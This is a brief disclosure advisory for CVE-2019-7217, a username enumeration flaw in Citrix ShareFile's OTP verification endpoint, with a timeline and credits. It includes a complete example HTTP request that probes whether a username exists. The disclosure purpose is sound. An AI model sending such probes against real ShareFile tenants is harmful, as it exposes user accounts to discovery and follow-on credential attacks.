Thursday, May 02, 2019

CVE 2019-7217: CITRIX SHAREFILE USER ENUMERATION

 

Author: Armando Huesca Prida


Summary:

It is possible to enumerate application username based on different server responses using the request to check the otp code. No authentication is required.

Tested Versions: Citrix ShareFile through 19.1

Product URL: https://www.sharefile.com/

CVE-ID: CVE-2019-7217

Details:

It is possible to enumerate application username based on different server responses using the request to check the otp code. No authentication is required.

Following an example of HTTP request:

POST /oauth/oauthapi.aspx HTTP/1.1
Host: xxx.sharefile.eu
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.sharefile.eu/Authentication/Login
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 293
Connection: close
tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&response_type=code&
client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&state=FxwxORudhXUqUh3phnC6Mg%3D%3D&

redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&h=&requireV3=false&code=123

Response if username is not correct:


Response if username is correct:


Timeline:

22-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release


Credit:

Discovered by Armando Huesca and Andrea Pessione of SKIT Cyber Security